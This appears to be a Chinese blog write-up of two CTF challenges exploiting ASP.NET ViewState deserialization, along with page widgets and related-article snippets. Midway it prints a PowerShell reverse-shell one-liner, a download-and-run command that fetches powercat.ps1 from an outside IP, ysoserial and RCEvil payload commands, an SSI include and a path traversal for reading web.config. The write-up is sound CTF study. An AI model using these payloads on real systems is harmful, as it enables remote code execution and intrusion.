asp.net 中 viewstate 反序列化攻击 学习记录

最新推荐文章于 2023-12-28 08:30:00 发布
最新推荐文章于 2023-12-28 08:30:00 发布
阅读量5.4k 收藏 6
点赞数 1
分类专栏: ctf 漏洞学习 文章标签: web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41891666/article/details/107290131
版权
0x00 前言

asp.net 平时接触得少,ctf 中也比较少遇到,之前对他的了解也只限于对 c# 语言的一些简单学习。然后这次在 buu 上面遇到 一道 [BJDCTF 2nd]EasyAspDotNet 题,然后在看wp 的时候,又碰巧了解到 HITCON CTF 2018 - Why so Serials? 和这题差不到,都是利用了viewstate 反序列化来做;然后在查资料的时候,又发现 CVE-2020-0688 exchange远程代码执行漏洞 也是利用viewstate 反序列化漏洞。
于是本着兴趣,也想对asp.net 更加了解一下,就结合这两个题目的复现 一起来学习一下 asp.net 中 viewstate 反序列化攻击

0x01 viewstate简单介绍

(1) 什么是viewstate ? 一句话 简单总结就是 :viewstate 是基于 web forms ,目的是为服务端控件状态进行持久化 。
在这里插入图片描述
关于web forms 和 服务端控件 的学习可以参考 ASP.NET Web Forms - 教程
网上找的一个图说得挺好的:
在这里插入图片描述
(2)viewState 序列化和反序列化 基础知识: viewState 序列化和反序列化

(3)viewState 的安全性:
i . viewState 如果没有加密,则可以直接解密得到里面的内容,burp 会自动viewState 解密,在线解密
可以设置viewSatteEncryptionMode 对viewState 进行加密
在这里插入图片描述
ii. 防篡改 ,客户端提交的 viewState 在服务器端后进行反序列化,并且检索数据,所以 为了防篡改,viewState 需要开启 MAC 验证 。那么mac 是如果产生的呢 ?在cyku 博客中找到了答案
在这里插入图片描述
上面的 validation_key 就是machineKey 中的validation_key 属性

0x02 HITCON CTF 2018 - Why so Serials?

题目给了源代码,
在这里插入图片描述
上传文件的后缀名进行了很多过滤,但是没有过滤 shtml 后缀
在这里插入图片描述
所以第一步就是利用shtml 来读取 web.config

<!-- test.shtml -->
<!--#include file="/web.config" -->

成功读取:
在这里插入图片描述
本来使用的powershell 反弹shell 命令是不需要download 其他文件的,

powershell -nop -c "$client = New-Object Net.Sockets.TCPClient('174.2.45.219',6666);$stream =$client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String);$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte =([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

但是使用这个反弹shell 用 ysoserial.net 生成payload 的时候遇到麻烦的转义问题:
在这里插入图片描述

-p ViewState 和 -s 参数不能同时使用

改变思路,使用另一个powershell 反弹shell 命令:

powershell IEX (New-Object System.Net.Webclient).DownloadString
('http://174.2.46.221:8000/powercat.ps1');
powercat -c 174.2.46.221 -p 6666 -e cmd

小号开启另一个buu linux 主机,上传 powercat.ps1 到主机上

在这里插入图片描述
然后主机用python 开启http 服务,监听8000端口 。
在这里插入图片描述
构造payload :

ysoserial.exe -o base64 -g TypeConfuseDelegate -f LosFormatter  -c "powershell IEX (New-Object System.Net.Webclient).DownloadString('http://174.2.46.221:8000/powercat.ps1');powercat -c 174.2.46.221 -p 6666 -e cmd"

一开始 直接使用 rcevil.net 中提到的 -f ObjectStateFormatter 来构造(而且cyku ,KaiBro中也是使用ObjectStateFormatter),但是会报错:
在这里插入图片描述
在这里插入图片描述
正在一筹莫展的时候,突然注意到 ysoserial 项目中提到一句:

Note: Machine authentication code (MAC) key modifier is not being used for LosFormatter in ysoserial.net. Therefore, LosFormatter (base64 encoded) can be used to create ObjectStateFormatter payloads.

于是在网上搜了搜 关于 LosFormatter 类 , ObjectStateFormatter 类 和 viewState 的关系:
LosFormatter:
在这里插入图片描述
ObjectStateFormatter:
在这里插入图片描述
再搜了搜两者的区别
里面说到 这两个类都是用作序列化viewState 的,但是 LosFormatter 后来被ObjectSateFormmatter 替代了,但是为了兼容 ,LosFormatter 也是可以使用的:
在这里插入图片描述

然后试着用 -f LosFormatter -e base64 来生成payload ,生成成功。

再用 RCEvil 来生成 带 MAC 的payload:

RCEvil.NET.exe -u /Default.aspx -v b07b0f97365416288cf0247cffdf135d25f6be87  -m MD5 -p {ysoserial 生成的payload }

生成的payload 做了 url 编码,解码,然后burp 重放:
在这里插入图片描述
此时收到 反弹shell:

在这里插入图片描述
c 盘 根目录下找到flag:
在这里插入图片描述

有点小兴奋,成为第二个做出来的人(虽然是复现,hhhh)
在这里插入图片描述

0x03 BJDCTF 2nd EasyAspDotNet

根据作者 wp 中写道,出题的灵感来自 https://devco.re/blog/2020/03/11/play-with-dotnet-viewstate-exploit-and-create-fileless-webshell/, 里面提到:
在这里插入图片描述
也就是说在实战中,由于企业的防护,直接使用前面说的 方法来攻击可能行不通,这时可以使用 ActivitySurrogateSelectorFromFile gadget 来实现无文件的 webshell 后门
回到题目,首先 /ImgLoad.aspx?path=…/…/web.config 路径穿越读取web.config 的内容:
在这里插入图片描述

执行命令:

ysoserial.exe -p ViewState -g ActivitySurrogateSelectorFromFile -c "ExploitClass.cs;./System.dll;./System.Web.dll" --generator="CA0B0334" --validationalg="SHA1" --validationkey="47A7D23AF52BEF07FB9EE7BD395CD9E19937682ECB288913CE758DE5035CF40DC4DB2B08479BF630CFEAF0BDFEE7242FC54D89745F7AF77790A4B5855A08EAC9" decryptionKey="B0E528C949E59127E7469C9AF0764506BAFD2AB8150A75A5"

但是报错,说没有找到 e.dll
感觉是不是本地ysoserial编译的问题,然后网上搜了搜,在 https://chen.oinsm.com/2020/03/28/BJDCTF-2nd/ 中提到可以直接下载带exe 的 ysoserial ,然后 把 ExploitClass.cs 和 System.dll ,Sytem.Web.dll 放到 ysoserial.exe 同级目录下,然后执行命令,成功生成payload
burp 抓包,发送payload ,成功执行命令:

在这里插入图片描述
这里需要注意的是 如果使用burp ,需要进行url 编码,使用Postman 的话就可以不需要

0x04 后记

由于对asp.net 不怎么了解,读paper 的时候,这个不懂又去搜一下,那个不懂也得去搜一下,最多的时候浏览器标签都超过30多个了。从一开始 重来没做过asp.net 的题, 也没接触过 viewstate 到 后来 查阅各种资料成功复现这两道viewstate ,一步步了解viewstate 以及解决复现中遇到的问题,确实学到了不少东西。走出自己的舒适区,多去挑战一些自己之前不敢挑战或者说不愿挑战的东西,学习如此,生活亦是如此。

kee_ke
关注
  • 1
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CVE-2019-18935:RCE漏洞用于ASP.NET AJAX的Telerik UI的.NET JSON反序列化漏洞
05-25
CVE-2019-18935 Telerik UI用于ASP.NET AJAX的.NET JSON反序列化漏洞的概念验证漏洞,允许远程执行代码。 描述 是用于Web应用程序的UI组件的广泛使用的套件。 它以不安全的方式反序列化JSON对象,从而导致在软件的基础主机上执行任意远程代码。 有关更多信息,请参见: DerpCon演讲( )详细介绍了利用不安全的反序列化的其他基础知识,并将其应用于这种利用,并逐步介绍了一些在ASP.NET Web应用程序上获取shell的技巧。 该主教福克斯,包括此漏洞的完整的演练,并利用此问题的详细信息(带补丁的说明一起)。 入门 先决条件 您需要安装才能使用build-dll.bat编译混合模式.NET程序集DLL有效负载。 安装 git clone https://github.com/noperator/CVE-2019-18935.git &&
ASP.NETViewState反序列化利用
qq_43571759的博客
10-04 1523
ASP.NETViewState反序列化利用 做项目学到一手记录viewstate是什么 按键名称存储每个控件的值,如哈希表 跟踪对视图状态值的初始状态的更改 序列化和取消序列化保存的数据到客户端上的隐藏窗体字段 自动恢复回贴的 ViewState 数据 ASP.NET 支持三种不同的开发模式: Web Pages(Web 页面)、MVC(Model View Controller 模型-视图-控制器)、Web Forms(Web 窗体)基于 web forms ,目的是为服务端控件状态进行持
ViewStateDecoder:Burpsuite扩展。 支持ASP.NET ViewStateDecoder
02-01
Microsoft .NET ViewState分析器和Burp套件扩展ViewStateDecoder 语言/ 该工具是PortSwigger产品Burp Suite的扩展。 支持Burp套件专业版/社区。 总览 此扩展是一个允许您显示ASP.NETViewState的工具。 注意,也可以使用命令行进行解码。 自v2020.3起,ViewState已隐藏在Burp套件。 它旨在与Burp套件v2020.x或更高版本一起使用。 修复了现有Burp套件ViewState的一些问题。 如何使用 可以按照以下步骤加载Burp Suite Extender。 单击[扩展器]选项卡上的[添加] 单击[选择文件...],然后选择BigIPDiscover.jar。 单击[下一步],确认没有错误发生,然后单击[关闭]关闭对话框。 信息标签 如果存在__VIEWSTATE参数,则可以从“历史记录”的“消息”选项卡的“选择扩展名...”按钮选择ViewState。 历史记录的“消息”选项卡上的“按钮”以选择ViewState。 切换标签以查看原始JSON。 ViewStateDe
asp.net 禁用viewstateweb.config里
01-21
代码如下:<pages enableSessionState=”true” enableViewState=”false” enableViewStateMac=”false”> 您可能感兴趣的文章:详解ASP.NET配置文件Web.configasp.net代码修改web.config节点的具体方法ASP.NET web.config数据库连接字符串connectionStrings节的配置方法asp.net web.config加密解密方法ASP.NET(C#)应用程序配置文件app.config/web.config的增、删、改操作
asp.netViewState的用法详解
10-23
本文给大家介绍asp.netviewstate的用法,涉及到viewstate的原理、用法、与session的对比等方面的知识,对viewstate用法感兴趣的朋友一起看看吧
Mojarra JSF ViewState 反序列化漏洞复现
0xSec
01-10 1392
JavaServer Faces,新一代的Java Web应用技术标准,吸收了很多Java Servlet以及其他的Web应用框架的特性。JSF为Web应用开发定义了一个事件驱动的、基于组件的模型。其最常用的是Sun(现在的Oracle)发布的Mojarra和Apache发布的MyFacesJavaServerFaces(JSF)概念在几年前就已经引入,现在主要在J2EE使用。
ASP.NET Web Forms - ViewState(视图状态)
weixin_45582785的博客
05-07 1008
维持 ViewState(视图状态) 在经典 ASP ,当一个表单被提交时,所有的表单值都会被清空。假设您提交了一个带有大量信息的表单,而服务器返回了一个错误。您不得不回到表单改正信息。您点击返回按钮,然后发生了什么…所有表单值都被清空了,您不得不重新开始所有的一切! 在 ASP .NET ,当一个表单被提交后,表单会连同表单值一起出现在浏览器窗口。如何做到的呢?这是因为 ASP .NET ...
php5.5 反序列化利用工具_如何借助ViewStateASP.NET实现反序列化漏洞利用
weixin_39870092的博客
11-24 960
概述ASP.NET Web应用程序使用ViewState来维护页面状态,并在Web表单保留数据。ViewState参数是Base64序列化后的餐胡,通常会在POST请求通过名为“__VIEWSTATE”的隐藏参数发送。在服务器端,将对这个参数进行反序列化,并检索数据。通常可以在Web服务器上运行可以伪造有效ViewState的代码。这一过程可以在禁用MAC验证功能或掌握以下内容的情...
Mojarra JSF ViewState 反序列化漏洞
黑白的博客
12-27 2019
声明 好好学习,天天向上 漏洞描述 JavaServer Faces (JSF) 是一种用于构建 Web 应用程序的标准,Mojarra是一个实现了JSF的框架。在其2.1.29-08、2.0.11-04版本之前,没有对JSFViewState进行加密,进而导致攻击者可以构造恶意的序列化ViewState对象对服务器进行攻击。 影响范围 2.1.29-08前 2.0.11-04前 复现过程 这里使用2.1.28版本 使用vulhub /app/vulhub-master/mojarra/jsf-view
asp.net 去除viewstate第1/2页
10-30
生成了这么多的一段东西,这段东西对seo一点好处也没有。而我要做的就是去掉它,但有一点,去掉但不能让它原来的控件和内容都发生变化
ASP.Net ViewState的实现
timmy3310的专栏
03-31 2510
  ViewState是.Net提出的状态保存的一种新途径(实际上也是老瓶装新酒);我们知道,传统的Web程序保存状态的方式有这样几种:  1、Application 这是Web应用程序生命期的全局保存区,保存在Application的数据是全局有效的;在Asp.Net,有一个应用程序池,其保存了数个(或数十个)应用程序实例,每一次请求都会从池取一个实例来处理请求,在请求完毕之前,这个
C#反序列化漏洞
m0_47968686的博客
08-20 1488
CVE-2020-0688反序列化漏洞 漏洞成因 漏洞产生的主要原因就是在Exchange ECP组件发现,邮件服务在安装的过程不会随机生成秘钥,也就是说所有默认安装的Exchange服务器的validationKey和decryptionKey的值都是相同的,攻击者可以利用静态秘钥伪造__VIEWSTATE参数从而触发反序列化漏洞。 环境、工具 WinServer2016、Exchange Server2016、win10、dnspy 分析 default.aspx被解析,继承Page类(Page
【转】ASP.NET ViewState详解
CPU_2的专栏
08-07 1007
作者:Infinities Loop 概述 ViewState是一个被误解很深的动物了。我希望通过此文章来澄清人们对ViewState的一些错误认识。为了达到这个目的,我决定从头到尾详细的描述一下整个ViewState的工作机制,其我会同时用一些例子说明我文章的观点,结论
危】未加密的__VIEWSTATE参数
天泽岁月
11-17 5102
危】未加密的__VIEWSTATE参数
HITCON CTF 2018 - Why so Serials
qq_42409373的博客
06-10 469
HITCON CTF 2018 - Why so Serials 打开发现是一道文件上传题,在页面源码可以发现是aspx写的网站,并在路径/Default.aspx.txt给出了源码,查看源码发现上传黑名单限制: blacklists = {".aspx", ".config", ".ashx", ".asmx", ".aspq", ".axd", ".cshtm", ".cshtml", ".rem", ".soap", ".vbhtm", ".vbhtml", ".asa", ".asp", ".ce
ViewState机制由浅入深
rongtou的专栏
05-08 2257
1         ViewState机制是什么?ViewState机制是asp.net对同一个Page的多次请求(PostBack)之间维持Page及控件状态的一种机制。在WebForm每次请求完,Page对象都会被释放,对同一个Page的多次请求之间的状态信息,如何进行维护呢?WebForm,每次请求都会存在客户端和服务器之间的一个交互。如果请求完成之后将一些信息传回到客户端,下次请
C#强化系列文章一:ViewState使用兼谈序列化
weixin_33695450的博客
11-20 151
ViewState的使用比较简单,一两句话就可以了。 赋值:ViewState[key] = value; 取值:value = ViewState[key]; 最主要的作用就是可以在当前页面保存值,ASP.NET的页面状态维护就是使用ViewState来实现的,基本上每一个ASPX页面都可以看到如下类似的html代码: &lt;input type="hidden" name="__...
.NET高级代码审计(第十一课) LosFormatter反序列化漏洞
最新发布
ahhacker86的专栏
12-28 960
为了帮助研发大佬们熟悉和掌握.NET应用安全相关的漏洞介绍和修复解决方案,我们创建了一个.NET应用安全建设的星球,专门科普.NET领域相关的安全漏洞和提供漏洞修复方法,星球部分主题如下图所示。格式序列化,此类支持序列化的任何对象图。另外如果对.NET安全攻防技术研究和渗透感兴趣的朋友们,可以扫下面的dot.Net安全矩阵星球二维码,加入我们。由于之前已经介绍了漏洞的原理,所以本篇就不再冗余的叙述,没有看的朋友请参考《由于之前已经介绍了漏洞的原理,所以本篇就不再冗余的叙述,没有看的朋友请参考《
asp.net viewstate 有什么作用
05-30
ASP.NETViewstate是一个用于存储页面状态的机制,它可以让ASP.NET Web Forms应用程序在处理页面的postback请求时,保留在页面上输入的数据和其他控件的状态信息。 Viewstate的作用是将页面上的控件状态以及其他需要在postback请求保存的数据,以一种隐藏的方式保存在页面,以便在下一次页面加载时,ASP.NET Web Forms应用程序可以还原这些状态信息,从而使得页面在处理postback请求时,能够正确地显示之前的状态。 Viewstate的实现方式是将控件的状态信息序列化为一个Base64编码的字符串,并存储在隐藏的input元素,该元素的名称为“__VIEWSTATE”。在处理postback请求时,ASP.NET框架会自动读取这个隐藏的input元素,将其反序列化为控件的状态信息,并还原控件的状态。 需要注意的是,Viewstate机制会在每个postback请求增加页面的大小,并且在处理大型页面时可能会导致性能问题。因此,在设计ASP.NET Web Forms应用程序时,需要谨慎使用Viewstate,并尽量减少Viewstate所存储的数据量。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值